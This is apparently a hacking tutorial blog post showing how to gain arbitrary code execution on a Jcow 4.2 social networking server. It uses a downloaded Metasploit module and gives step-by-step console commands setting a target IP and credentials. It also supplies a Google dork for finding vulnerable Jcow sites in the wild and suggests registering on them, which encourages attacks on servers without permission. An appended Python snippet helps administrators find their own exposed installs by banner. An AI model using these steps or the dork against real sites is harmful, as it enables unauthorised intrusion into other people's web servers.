
Social Networking Web Server Hacking

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution

By : ABHISHEK GUPTA


It has been a very long time since I last wrote about hacking a web server. Today, while surfing around "again", I found that the Jcow social networking engine can be exploited, and the exploit ranking is marked as "excellent".

So what actually happens when you run this vulnerable Jcow version? Simply put, the attacker can get into your web server directory and do anything there. For example, if you host the vulnerable Jcow version (on insecure hosting as well :-) ), an attacker can own your web server directory.
In this example, let's say I have a vulnerable Jcow web server at IP address 192.168.8.94. It's better to try this by installing your own web server, but if you want to find Jcow in the wild you can search with the Google dork "intext:Powered by Jcow 4.2.0" and register as a normal user there. In this tutorial I have already registered with username victim and password victim :-)
Okay, I hope you understand what I said above :-P To make it more realistic, let's try the tutorial…

Level : Medium

Victim server : works fine if the victim uses Windows XP SP3
Victim vulnerable application : Jcow 4.2
Attacker O.S : obviously you need Backtrack 5 R1

Requirements :

You only need the two items below.

1. Metasploit framework
2. Jcow.rb exploit (mediafire.com)

Now let's start.

4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution Process:

1. First of all, copy the jcow.rb exploit you downloaded from the link above into the /pentest/exploits/framework/modules/exploits/remote/ folder (see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

The text "framework" in the path is shown in blue only because I'm using Backtrack 5 R1 with Metasploit v4.0.1. The name depends on your Metasploit version, so on your computer it may be "framework3" or "framework2" and so on. Don't let that confuse you.

2. Once the file has been copied successfully, open your Metasploit console and use the exploit you just added, as shown below.

msf > use exploit/remote/jcow

3. After completing step 2, the next step is to view the available switches for this exploit by running the show options command, and then configure them (see the text in red).

msf  exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf  exploit(jcow) > set username victim --> set the username
username => victim
msf  exploit(jcow) > set password victim --> set the password
password => victim
msf  exploit(jcow) > set uri jcow --> only if Jcow is not in the / directory, fill it in here
uri => jcow

Important:

set uri is used if Jcow was not installed in the web server's main directory, for example http://web-server.com/jcow.

4. Your work is now almost done. After everything has been set up successfully, the next thing to do is run the exploit by using the exploit command.
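
For administrators, the "Powered by Jcow 4.2.0" footer string quoted above is also the quickest way to find your own installs that still advertise this release. The following is an added example, not part of the original post: it classifies pages you have already fetched from your own sites by the Jcow banner they show. The function names, the sample pages and the choice to flag every 4.2.x banner are assumptions of this example.

```python
import re

# Footer banner quoted in the post: "Powered by Jcow 4.2.0". Tags may sit
# between the words when the banner is rendered as a link.
BANNER_RE = re.compile(
    r"Powered\s+by\s+(?:<[^>]+>\s*)*Jcow(?:\s*<[^>]+>)*\s+(\d+(?:\.\d+)*)",
    re.IGNORECASE,
)

# The post names Jcow 4.2 / 4.2.0 as the vulnerable release. Flagging every
# 4.2.x banner is an assumption of this example, not a vendor statement.
FLAGGED_SERIES = (4, 2)


def jcow_version(html):
    """Return the advertised Jcow version as a tuple of ints, or None."""
    match = BANNER_RE.search(html)
    if match is None:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def triage(pages):
    """Classify {url: html} as 'flagged', 'other-version' or 'no-banner'."""
    result = {}
    for url, html in pages.items():
        version = jcow_version(html)
        if version is None:
            result[url] = "no-banner"
        elif version[:2] == FLAGGED_SERIES:
            result[url] = "flagged"
        else:
            result[url] = "other-version"
    return result


# Constructed sample pages standing in for HTML fetched from your own sites.
SAMPLE_PAGES = {
    "http://community.example.test/jcow/":
        '<div id="footer">Powered by <a href="#">Jcow 4.2.0</a></div>',
    "http://staging.example.test/": "<p>powered by Jcow 5.0</p>",
    "http://blog.example.test/": "<p>Powered by another engine</p>",
}

if __name__ == "__main__":
    for url, status in triage(SAMPLE_PAGES).items():
        print(f"{status:14} {url}")
```

A "no-banner" result proves nothing, since the footer can be edited out of the template; confirm the installed version on disk before treating a site as clear.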
